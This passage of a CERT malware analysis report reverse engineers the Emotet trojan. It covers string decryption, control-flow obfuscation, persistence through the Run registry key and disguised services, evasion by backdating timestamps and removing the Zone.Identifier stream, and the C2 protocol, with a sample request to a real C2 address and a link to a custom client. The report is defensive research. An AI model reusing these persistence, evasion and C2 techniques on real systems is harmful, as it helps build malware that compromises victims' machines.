The first time we met the use of a string was in a call to `LoadLibraryW()`, the only parameter of which is the name of the library to be loaded. The value passed to `LoadLibraryW()` is returned from function `FUN_004035f0()`, which in this case operates on binary data at memory address `0x40d7f0`. It became apparent that this function must be doing some kind of transformation (read: decryption) to the data pointed to by its input.

Figure 29. Emotet trojan’s call of string decryption function

We reverse engineered the function and confirmed our guess: its purpose is to decrypt the input binary data to a Unicode string. The first 4 bytes of the binary data are the XOR key, the next 4 bytes are the string’s encrypted length and the rest is the encrypted string itself. After decrypting the length, the function iterates over all quadruples of encrypted characters (remember that the key is 4 bytes long) until all have been decrypted.

Figure 30. Emotet trojan’s string decryption internals

For the sake of completeness, in [decryptWideString.c](https://github.com/grnet/emotet-utils/blob/master/decompiled/decryptWideString.c) we included the reverse engineered code of that function.

Two more versions of this function exist in the executable: one that decrypts the ciphertext to an ASCII string and one to a byte array. Luckily, all are compatible with each other as ciphertexts are processed as 32-bit integers. Only their output types differ.

We implemented a tool to decrypt any string or byte array in the executable. The source code can be found in [decrypt_bytes.py](https://github.com/grnet/emotet-utils/blob/master/utilities/decrypt_bytes.py).

```
$ ./decrypt_bytes.py nested-payload-2.exe 0xb9f0
shlwapi.dll
```

### Control Flow Obfuscation

We continued our analysis with function `FUN_0406860()`, the first function that the entry-point calls, and observed some kind of control flow obfuscation. Specifically, the function’s body is split into multiple `if` blocks, wrapped in a `while` loop. The flow is determined by a control variable that is set at the end of each block. Furthermore, as seen from the function graph below, the majority of the blocks have the same predecessor and successor blocks.
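To make the pattern concrete, here is a toy Python sketch of a function written normally and then rewritten in the dispatcher style described above: a `while` loop, a control variable, and independent `if` blocks that each set the next state. The function, the state names and the state values are invented for illustration and are not taken from the trojan.

```python
def checksum_plain(data: bytes) -> int:
    """Straightforward version: sum of all bytes, folded to 16 bits."""
    total = 0
    for b in data:
        total += b
    return total & 0xFFFF


def checksum_flattened(data: bytes) -> int:
    """Same logic, with the body split into blocks driven by a control variable."""
    # Hypothetical state values; obfuscators tend to use random-looking constants.
    INIT, CHECK, BODY, DONE, EXIT = 0x3A1F, 0x77C2, 0x1B09, 0x5E44, 0x0
    state = INIT
    total = 0
    i = 0
    result = 0
    while state != EXIT:
        # The blocks appear in an arbitrary order; only `state` decides what runs.
        if state == BODY:
            total += data[i]
            i += 1
            state = CHECK
        if state == INIT:
            total = 0
            i = 0
            state = CHECK
        if state == DONE:
            result = total & 0xFFFF
            state = EXIT
        if state == CHECK:
            state = BODY if i < len(data) else DONE
    return result
```

Both functions return the same value for any input, but the flattened version no longer shows the loop structure at a glance, which is what makes the decompiled output tedious to follow.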
This technique resembles the Control Flow Flattening technique, in which each function is split into basic blocks that are encapsulated in a `switch` block wrapped in a `while` loop.

Figure 31. Emotet trojan’s Control Flow Obfuscation

This technique is also applied to the vast majority of the functions in the executable. We were aware of techniques to automatically de-obfuscate control flow flattening (e.g. the technique described in [this quarkslab blog post](https://blog.quarkslab.com/deobfuscation-recovering-an-ollvm-protected-program.html)), but since the size of the code was small enough we decided to follow the flow manually.

## Chapter 4. The trojan’s internals

### Introduction

In the previous chapter we had a look at the trojan executable. We identified several obfuscation techniques incorporated in the executable and described the methods we used to overcome them. In this chapter, we will discuss the trojan’s inner functionalities.

### Main flow overview

We followed a depth-first approach to reverse engineer the executable. We started from the function `FUN_0406860()`, the one called by the executable’s entry-point, which we called “main”.

Figure 32. Emotet trojan’s entry-point

Then, we followed the flow examining each function call. We did this until we reached a function that either made no further calls or only invoked already examined functions. After a couple of weeks we had completely studied the executable’s code. As a result, we were able to draw the code flow of the main function in a meaningful manner. Below, we present the main control loop of the trojan:

Figure 33. Emotet trojan’s main function flow chart

The basic groups of states are highlighted:

- Grey states: Initialization of internal variables.
- Purple states: Persistence-related operations (running during the first run of the trojan or after communicating with the C2 network).
- Green states: Initialization of parameters related to the communication with the C2 network.
- Blue states: Initialization of static data to be included in requests to the C2 network.
- Orange states: Re-initialization of variable data to be included in the next request to the C2 network.
- Red states: Communication with the chosen C2 server.
- Yellow state: Handling of the C2 server’s response.

Initially, the trojan loads the required libraries (states 1 and 2) and initializes its internal variables (state 3). Then, it checks whether it was started with command line arguments or not (state 4). The existence of command line arguments indicates that this is the first run of a self-update. The command line arguments contain the file path where the executable will have to migrate to. In that case, states 8-13 perform a series of actions related to the persistence of the trojan. Specifically, any existing file in the target file-path is renamed (state 8), the current executable is stored in the target file-path and its Zone Identifier ADS is removed (state 9). The created file is marked as “old” by changing its timestamps (state 10). If the process runs with administrative permissions, a new Service for the executable is created (state 11). Then, it waits until it receives a signal from its parent process (state 12). Finally, it runs itself from the newly created executable (state 13).

If command line arguments are absent, it is either the first run after the Protector extracted the trojan or any later run. This is inferred by checking the executable’s timestamp (state 5). If it is indeed a first run, any existing Services for the executable are removed provided that the executable has administrative permissions (state 6), and then a random legitimate-looking file-path is picked as the target for the executable file (state 7). Then, states 8-13 run, performing the series of actions described earlier.
If it is not a first run (indicated by an “old” timestamp) and the trojan runs with administrative permissions, it checks whether its parent process name is `services.exe` (state 14). If so, it runs itself in a new process (state 13) and terminates the current process.

Finally, if this is not the first run (indicated by an “old” timestamp), and the trojan runs without administrative rights or its parent process name is not `services.exe`, the C2 communication flow happens. First, a new thread that monitors changes of the current process’ executable filename is started (state 15). Then the control reaches state 16 and always returns to it until the current process’ executable filename changes. Such a change is the result of a self-update; after it, the trojan waits for any threads to terminate (state 39) and then terminates its process.

While no changes of the filename are detected, the trojan repeatedly communicates with C2. First, the C2 communication parameters are initialized once (states 17-20). Furthermore, the request data regarding the host system information are also initialized once (states 21-26). On each communication attempt, the list of the processes currently running on the system as well as the list of active payload IDs are included in the request (states 27-28). Then the actual communication with C2 is performed (states 29-31).

Upon a successful communication the trojan first checks whether a termination flag was received. In that case it immediately moves its executable to the Temp folder and terminates itself (state 38). Otherwise, any existing files in the folder containing the trojan’s executable are deleted and a new auto-run Registry Key is created (state 32). Then, the trojan loops over the received payloads and executes them (state 33).

In the rest of the chapter we will focus on two main functionalities of the trojan: the persistence mechanisms and the communication with the Command-and-Control servers.
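The branching described in this section can be condensed into a small decision function. The sketch below is our own summary in Python, not decompiled code: the function name, the parameter names and the returned labels are invented, and only the conditions and the state numbers come from the description above.

```python
def next_phase(has_cmdline_args: bool,
               timestamp_is_old: bool,
               is_admin: bool,
               parent_name: str) -> str:
    """Return a label for the phase the main loop enters after state 3."""
    if has_cmdline_args:
        # First run of a self-update: the target path comes from the arguments.
        return "persist (states 8-13)"
    if not timestamp_is_old:
        # First run after the Protector extracted the trojan.
        return "clean up services, pick path, persist (states 6-13)"
    if is_admin and parent_name == "services.exe":
        # Started as a Service: relaunch in a new process and exit.
        return "relaunch (states 14, 13)"
    # Any other later run: talk to the C2 network.
    return "C2 communication (state 15 onwards)"


# Example: a later run started by a regular user from the Run registry entry.
print(next_phase(False, True, False, "explorer.exe"))
```

Note that the timestamp check only matters when no command line arguments are present, which mirrors the order of states 4 and 5.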
### Persistence mechanisms

The trojan treats a run as its first run if it is started with command line arguments, or if the `LastWriteTime` of its executable file is less than 8 days old. The timestamp is retrieved by calling `GetFileInformationByHandleEx()` on a handle to the file whose path is returned by `GetModuleFileNameW()`.

Upon its first run, the trojan places its executable file in a sub-folder inside one of the following Windows Special Folders:

- `CSIDL_LOCAL_APPDATA` (usually `C:\Users\username\AppData\Local`) if the trojan runs without administrator rights, or
- `CSIDL_SYSTEMX86` (usually `C:\Windows\SysWOW64`) if the trojan runs with administrator rights.

The names of the sub-folder and of the malware’s file depend on whether the executable was run with command line arguments or not:

- With no command line parameters, the malware chooses two random files from the legitimate executable (.exe) and library (.dll) files contained in the `CSIDL_SYSTEM` (usually `C:\Windows\System32`) folder. The names of these randomly chosen files are used to define the name of the sub-folder that the malware will be stored in, as well as the filename that the trojan will be stored with inside this sub-folder.
- When invoked with command line parameters, the sub-folder name and filename for the malware are parsed from the base64-encoded command line argument. The structure of the base64-decoded command line argument is described in detail in the Response Payload subsection (payload type 4).

Furthermore, it deletes the corresponding `Zone.Identifier` Alternate Data Stream (which is added by the web client to mark files downloaded from external sites as possibly unsafe to run). Finally, all the timestamp attributes of the file (`CreationTime`, `LastAccessTime`, `LastWriteTime` and `ChangeTime`) are set to 8 days in the past. In this way, the next time the malware runs, it will be aware that it is not the first time.

To achieve persistence, two different methods are used:

1. Registry Key: Upon receiving a C2 response, it creates a value under the `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` registry key. The value type is String (`REG_SZ`, `0x1`), its name is the filename of the trojan and its data is the full path inside the Windows Special Folder.
2. System Service: Upon its first run, if running with administrator rights, it creates a new Service. The Service type is `SERVICE_WIN32_OWN_PROCESS` (`0x10`) and its binary path is the full path inside the Windows Special Folder. Once the service is created, it picks a random legitimate service from the list returned by `EnumServicesStatusExW()` and copies its description to the malicious service, using `QueryServiceConfig2W()` and `ChangeServiceConfig2W()` respectively, making it difficult to distinguish from legitimate services.

### Command-and-Control

After achieving persistence, the trojan tries to communicate with one of the Command-and-Control (C2) servers to inform it about the compromised system and retrieve the payloads to execute.

Emotet’s C2 network consists of multiple C2 servers with different up-times, which provides redundancy and lowers the probability of detection. In total, we identified 126 unique C2 servers spread all over the world, mainly located in Europe, the Americas and south-east Asia:

Figure 34. Emotet’s Command-and-Control server locations

The trojan binaries come with the list of IPv4 addresses and ports of all C2 servers embedded. The C2 servers are tried sequentially, until one responds successfully. On the first run, the trojan starts from the first C2 server of the list. On all subsequent runs, it continues from the last C2 server that responded successfully. We again wrote a short script to automatically extract the IPv4 addresses and ports from the binaries, which can be found in [extract_c2_socket_addresses.py](https://github.com/grnet/emotet-utils/blob/master/utilities/extract_c2_socket_addresses.py). Finally, all C2 servers share a common private key which is used for protecting the communication between the trojan and the C2 server. The public key is also embedded in the trojan binaries, albeit encrypted.

Data exchange between the trojan and the C2 server utilizes a complex serialization and deserialization mechanism, which includes compression and encryption of both the request and response data. The actual communication takes place over plain HTTP, presumably to evade protections based on flagged TLS certificates.

During the trojan’s initialization phase, the C2’s RSA-768 public key is decrypted (using the decryption function described in the previous chapter) and a random AES-128 session key is generated (using the Windows Crypto API). The public key is used to encrypt the session key and to verify the response, while the session key is used to encrypt the request and decrypt the response. The encrypted session key is included in the request so that the C2 server can decrypt the request payload. Finally, SHA-1 is used for hashing.

The primitive data types used in the exchanged messages are the `byte`, the `char` and the `uint` (32-bit). The non-primitive data types are `struct Bytes` and `struct String`, as shown in the following code snippet:

```
struct Bytes {
    byte *buffer;
    uint size;
};

struct String {
    char *buffer;
    uint length;
};
```

All primitive data types are serialized in little-endian byte order. A `struct Bytes` is serialized to the size of the buffer followed by the actual bytes of the buffer. A `struct String` is serialized to the length of the string followed by the characters of the string, excluding the null terminator.

**Request Payload**

The trojan uses information gathered from the compromised system to assemble the _request payload_.
This includes information that can be used to uniquely identify the system, information about the operating system and the running processes as well as the current state of the trojan itself. Upon analyzing the binary, we concluded that the structure of the request payload as used internally by the trojan is the following:

```
struct RequestPayload {
    struct String systemId;
    uint systemInfo;
    uint rdpSessionId;
    uint date;
    uint value_1000;
    struct String otherProcessExecutableNames;
    struct Bytes payloadIds;
    uint currentProcessExecutablePathHash;
};
```

The request payload struct is serialized to the serialized request payload by serializing and concatenating its fields in the order they appear, as shown in the image below.

Figure 35. Emotet’s serialized request payload

**systemId**

The ID assigned to the compromised system. It is constructed using the format string `%s_%08X`, where the first specifier corresponds to the computer name and the second specifier to the volume serial number of the disk partition where Windows is installed. To get the computer name, `GetComputerNameA()` is used. To get the volume serial number, `GetWindowsDirectoryW()` is used to get the drive letter of the partition where Windows is installed and then `GetVolumeInformationW()` is utilized to get the volume serial number of that partition. Non-letter and non-digit characters in the computer name are replaced by the character `X`. For example, for the compromised system with computer name `DESKTOP-K1C601` and volume serial number `B4A6-FEC6` the value of `systemId` would be `DESKTOPXK1C601_B4A6FEC6`.

**systemInfo**

A numeric value that encodes information regarding the OS and the architecture of the compromised system. The trojan uses `RtlGetVersion()` and `GetNativeSystemInfo()` to get the `OSVERSIONINFOEXW` and `SYSTEM_INFO` structures, respectively.
The numeric value is constructed as shown below:

```
OSVERSIONINFOEXW.wProductType * 100000 +
OSVERSIONINFOEXW.dwMajorVersion * 1000 +
OSVERSIONINFOEXW.dwMinorVersion * 100 +
SYSTEM_INFO.wProcessorArchitecture
```

For example, the `systemInfo` value of `110009` means that the operating system is Windows 10 and the processor architecture is x64:

```
wProductType           : 1  (VER_NT_WORKSTATION)
dwMajorVersion         : 10
dwMinorVersion         : 0
wProcessorArchitecture : 9  (PROCESSOR_ARCHITECTURE_AMD64)
```

**rdpSessionId**

The Remote Desktop Services session under which the current process is running. The trojan uses `GetCurrentProcessId()` to get the current process ID and `ProcessIdToSessionId()` to convert the process ID to the RDP session ID.

**date**

The value `20200416` is hardcoded in the request payload, which can presumably be decoded to the date April 16, 2020. This could be the date that the current campaign started; however, this cannot be confirmed.

**value_1000**

The value `1000` is hardcoded in the request payload. Its purpose is unknown.

**otherProcessExecutableNames**

A comma-separated list of the names of all processes running in the system, except for the current and the parent processes. The trojan uses `CreateToolhelp32Snapshot()` to take a snapshot of all processes in the system and `Process32FirstW()` / `Process32NextW()` to iterate over them. The current and the parent processes are filtered out. For example:

```
SearchFilterHost.exe,SearchProtocolHost.exe,Taskmgr.exe,conhost.exe,PowerShell.exe,not
```

**payloadIds**

The IDs of the payloads received from the C2 server that are currently running. To support this functionality, the C2 server assigns an ID to every payload and the trojan maintains an in-memory list of the active payloads. Using this value, the C2 server is informed about the payloads that are currently running. The list of IDs is represented as an array of unsigned integers.
For example, if the payloads with IDs `2643`, `2647`, and `2759` are currently running, the value of `payloadIds` would be:

```
53 0a 00 00 57 0a 00 00 c7 0a 00 00
```

**currentProcessExecutablePathHash**

The hash of the full path of the current process’ executable, lower-cased. The trojan uses `GetModuleFileNameW()` to get the path and a custom hash function to hash the path, the reverse engineered version of which can be found in [hashLowercase.c](https://github.com/grnet/emotet-utils/blob/master/decompiled/hashLowercase.c). For example, if the path of the trojan’s executable was `C:\Users\IEUser\AppData\Local\dxdiag\reg.exe`, the hash value would be `0x9f955b9`.

**Request**

The request encapsulates the request payload described before as well as the request flags. The request flags are used to specify the type of the request payload.

```
struct Request {
    uint flags;
    struct Bytes compressedPayload;
};
```

Before serializing the request struct, the serialized request payload is compressed using an LZ77-style algorithm, forming the compressed request payload. The request struct’s fields are serialized in the order they appear to form the serialized request, following again the aforementioned serialization rules. Finally, the session key is encrypted with the C2 servers’ public key (96 bytes), the serialized request is hashed (20 bytes) and then encrypted with the session key to form the _encrypted request_. The encrypted session key, the request hash and the encrypted request form the _request body_. This is illustrated in the following image.

Figure 36. Emotet’s encrypted request

**HTTP request-response**

The trojan communicates with the C2 server over plain HTTP, using the WinINet API. In preparation for the communication, the trojan generates a random URL path, a random boundary for the multipart/form-data body and random field and file names for the form part to be submitted. Various headers (e.g. the Accept header) are hardcoded, while others (e.g.
the User-Agent header) are system-dependent. Following is a sample HTTP request sent by the trojan to a C2 server:

```
GET /3QDtL0eyVn/macjAF9/ HTTP/1.1
Host: 46.101.58.37:8080
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Referer: 46.101.58.37/
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)
DNT: 1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------gby5HOqeZpTWuWuQV0Pq0e
Content-Length: 5090

-----------------gby5HOqeZpTWuWuQV0Pq0e
Content-Disposition: form-data; name="iopq"; filename="yyexctg"
Content-Type: application/octet-stream

-----------------gby5HOqeZpTWuWuQV0Pq0e-
```

And the corresponding HTTP response:

```
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Jan 2021 18:09:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 87076
Connection: keep-alive
Vary: Accept-Encoding
```

**Response**

Just like the request body, the response body consists of three parts: the compressed response’s signature, the compressed response’s hash and the encrypted response. The signature is generated with the C2 servers’ private key and the compressed response is encrypted using the session key submitted to the C2 server as part of the request.

Figure 37. Emotet’s encrypted response

Upon decrypting the encrypted response, the trojan retrieves a `uint` representing the decompressed response size followed by the compressed response, which can be decompressed to the serialized response using the same LZ77-style algorithm that was used to compress the request. Finally, the serialized response can be deserialized to the following struct, adhering again to the common serialization rules.
```
struct Response {
    struct Bytes serializedPayload;
    uint flags;
};
```

The response flags are used to inform the trojan whether to continue or terminate its operation after executing the payload.

**Response Payload**

The serialized response payload is a series of serialized `struct Bytes`, each of which contains a serialized response payload struct.

```
struct ResponsePayload {
    uint payloadId;
    uint payloadType;
    struct Bytes payload;
};
```

Figure 38. Emotet’s serialized response payload

**payloadId**

Every payload has a unique ID. As discussed in the subsection about the request payload, this is used to keep track of the payloads that are being executed by each compromised system. Payload IDs are incremental integers.

**payloadType**

Each received payload is handled based on the `payloadType` property. There are 4 payload types:

- Type 1 (`0x1`): the payload is an executable (.exe) and it is written to a file which is executed in a new process, using `CreateProcessW()`.
- Type 2 (`0x2`): the payload is an executable (.exe) and it is written to a file which is executed in a new local user process, using `CreateProcessAsUserW()`.
- Type 3 (`0x3`): the payload is a dynamic-link library (.dll), it is loaded into the address space of the trojan’s process by a custom loader (similar to those discussed in previous chapters) and then its entry-point is called in a new thread, using `CreateThread()`.
- Type 4 (`0x4`): the payload is an executable (.exe) and it is written to a file which is executed in a new process, using `CreateProcessW()`, with command line arguments.

For types 1, 2 and 4, the file is stored in the same directory where the executable of the trojan resides.
Its filename is generated by concatenating the name without the extension of a random .exe or .dll file in the `CSIDL_SYSTEM` (`C:\Windows\System32`) directory, the payload ID in hexadecimal format (`%x`) and the `exe` extension.

For type 3, the entry-point is called with a non-standard reason (`10`) and the reserved argument is a pointer to a struct with the system ID and the C2 servers’ public key in DER format, as shown below.

```
struct DllArgs {
    char *systemId;
    struct Bytes c2PublicKeyDer;
};
```

For type 4, the executable is called with a single command line argument, which is a base64-encoded serialized struct with a handle to the calling process and the parent directory and name of the calling process’ executable, as shown below. This type is used for updating Emotet to newer versions.

```
struct CmdLineArgs {
    HANDLE *hProcess;
    WCHAR *directoryAndFilenameWithoutExtension;
    DWORD directoryAndFilenameWithoutExtensionLength;
};
```

**payload**

The actual data of the payload.

## Chapter 5. Monitoring the updates

### Introduction

In the previous chapter we thoroughly described the internals of the trojan. Having a good understanding of the communication protocol between the trojan and the C2 network we could now communicate with any C2 server, posing as an instance of the trojan.

In this final chapter we show the custom client that we developed in order to communicate with the C2 servers with arbitrary requests and describe the responses that we received. Furthermore, we briefly describe how we used the Ghidra Scripting API in order to automate repeated processes of reverse-engineering which proved to be helpful for extracting useful information out of the received update payloads (e.g. new IP addresses of the C2 network).
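As a recap of the serialization rules from Chapter 4 that such a client has to follow, the sketch below builds a serialized request payload in Python. It is an illustration under assumptions, not an excerpt from client.py: the helper names are ours, the length prefixes are assumed to be 32-bit `uint` values, strings are assumed to be plain ASCII, and the compression, hashing and encryption layers are left out.

```python
import struct


def ser_uint(value: int) -> bytes:
    # Primitive types are serialized in little-endian byte order.
    return struct.pack("<I", value)


def ser_bytes(buf: bytes) -> bytes:
    # struct Bytes: size of the buffer followed by the buffer itself
    # (assumption: the size prefix is a 32-bit uint).
    return ser_uint(len(buf)) + buf


def ser_string(text: str) -> bytes:
    # struct String: length followed by the characters, no null terminator.
    return ser_bytes(text.encode("ascii"))


def make_system_id(computer_name: str, volume_serial: int) -> str:
    # Non-letter and non-digit characters become "X"; format string %s_%08X.
    cleaned = "".join(
        c if (c.isascii() and c.isalnum()) else "X" for c in computer_name
    )
    return "%s_%08X" % (cleaned, volume_serial)


def make_system_info(product_type: int, major: int, minor: int, arch: int) -> int:
    return product_type * 100000 + major * 1000 + minor * 100 + arch


def ser_request_payload(system_id, system_info, rdp_session_id,
                        process_names, payload_ids, exe_path_hash) -> bytes:
    # Fields are serialized and concatenated in struct RequestPayload order.
    ids = b"".join(ser_uint(i) for i in payload_ids)
    return b"".join([
        ser_string(system_id),
        ser_uint(system_info),
        ser_uint(rdp_session_id),
        ser_uint(20200416),                   # hardcoded "date" field
        ser_uint(1000),                       # hardcoded value, purpose unknown
        ser_string(",".join(process_names)),  # otherProcessExecutableNames
        ser_bytes(ids),                       # payloadIds
        ser_uint(exe_path_hash),
    ])


if __name__ == "__main__":
    sid = make_system_id("DESKTOP-K1C601", 0xB4A6FEC6)
    blob = ser_request_payload(sid, make_system_info(1, 10, 0, 9), 1,
                               ["conhost.exe"], [2643, 2647, 2759], 0x9F955B9)
    print(sid, len(blob))
```

The helpers reproduce the worked examples from Chapter 4: the computer name `DESKTOP-K1C601` with serial `B4A6-FEC6` yields `DESKTOPXK1C601_B4A6FEC6`, and a Windows 10 x64 workstation yields `110009`. The session ID, process list and path hash passed in the usage example are arbitrary sample inputs.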
### Developing a custom “Emotet” client

We have already described the communication between the trojan instances and the C2 network, including the detection of the C2 servers, the structure of the requests and responses as well as the compression and encryption algorithms. Based on this analysis we could develop our own Emotet client, which allowed us to perform requests with arbitrary request payloads. Like the rest of the scripts, the client was implemented in Python. The source code can be found in [client.py](https://github.com/grnet/emotet-utils/blob/master/utilities/client.py). Using this client, we could monitor the uptime of each of the listed C2 servers and parse the C2 responses.

Most of the C2 responses were loadable DLL extensions to the trojan (type 3). The payloads received from different C2 servers at the same point in time were identical or almost identical, differing only in the first 48 bytes of the read-only data section. Some of the payloads were obfuscated using variations of the techniques described in Chapter 3, while others were not. The only update (type 4) that we received during our analysis was Europol’s clean-up client.

From the collected statistics, only a fraction of the C2 servers were online at any given time. The set of active C2 servers was changing over time, presumably to avoid triggering alerts and being detected.

### Automating repeated reverse-engineering processes

On each received payload we had to repeat the processes that we followed to overcome the incorporated obfuscation techniques. Since these techniques were slightly different for each payload (e.g. different XOR keys were used, algorithm constants were modified, variables were stored in different memory addresses, etc.) we had to develop some pieces of code implementing some basic logic. We used the Ghidra scripting API and developed Python scripts that automated repeated processes that required considerable manual effort.
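As an illustration of the logic such a script has to reimplement, the string decryption scheme from Chapter 3 can be sketched in plain Python as follows. This is a minimal sketch and not the code of decrypt_bytes.py: it assumes little-endian 32-bit words, assumes that the decrypted length counts plaintext bytes, and uses function names of our own. The `encrypt_blob` helper exists only to produce example input.

```python
import struct


def decrypt_blob(blob: bytes) -> bytes:
    """Decrypt a blob laid out as: 4-byte XOR key, 4-byte XORed length, XORed data."""
    key, enc_len = struct.unpack_from("<II", blob, 0)
    length = enc_len ^ key
    out = bytearray()
    # The ciphertext is processed as 32-bit integers, one key-sized word at a time.
    padded_len = ((length + 3) // 4) * 4
    for offset in range(8, 8 + padded_len, 4):
        (word,) = struct.unpack_from("<I", blob, offset)
        out += struct.pack("<I", word ^ key)
    # Drop the padding bytes of the last word.
    return bytes(out[:length])


def encrypt_blob(plain: bytes, key: int) -> bytes:
    """Inverse helper (hypothetical), used here only to build an example input."""
    padded = plain + b"\x00" * (-len(plain) % 4)
    words = struct.unpack("<%dI" % (len(padded) // 4), padded)
    body = b"".join(struct.pack("<I", w ^ key) for w in words)
    return struct.pack("<II", key, len(plain) ^ key) + body


if __name__ == "__main__":
    sample = encrypt_blob(b"shlwapi.dll", 0x1234ABCD)
    print(decrypt_blob(sample).decode("ascii"))
```

Because the key and the layout are read from the blob itself, the same routine keeps working when a new payload uses a different XOR key; only the address of each blob has to be located again.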
Specifically, the two main processes that were automated are the decryption of the strings and the resolution of the imported symbols. These basic automations made the analysis of the received updates significantly easier. Implementations of the algorithms can also be found in [decrypt_bytes.py](https://github.com/grnet/emotet-utils/blob/master/utilities/decrypt_bytes.py) and [generate_symbol_hashes2.py](https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes2.py).

## Epilogue

In this analysis we documented our defensive strategy against a large trojan-spreading campaign. Our approach was based on static analysis and reverse engineering. We initially avoided running any of the trojan’s stages. This was an intentional choice because with dynamic analysis certain conditions and corner cases could not have been triggered and whole code paths could have been skipped. After many hours of reverse engineering and building enough confidence that we had a full understanding of the trojan’s inner workings, we used dynamic instrumentation to confirm our observations. For the latter we used the Frida dynamic instrumentation toolkit. Nevertheless, as shown by our work, the dynamic analysis of a malware is not always required in order to understand and analyze its functionality.

Notice that in this analysis we only focused on analyzing the trojan itself and intentionally skipped the analysis of payloads spread by the C2 network. From the analysis of the trojan’s internals in Chapter 4, it became apparent that Emotet enables the C2 servers to run arbitrary payloads on infected computers. It is known that Emotet had been used in order to spread banking-related malware, e-mail harvesting malware, as well as ransomware.
However, analyzing those payloads was considered out of the scope of planning a generic defense against Emotet.

Finally, we did not include any analysis of the last payload that our update-monitoring infrastructure received, which according to our observations and combined with public reports is Europol’s clean-up payload.

We hope that IT Security professionals will find our work useful for defending against similar malware in the future.

© 2022 GRNET CERT.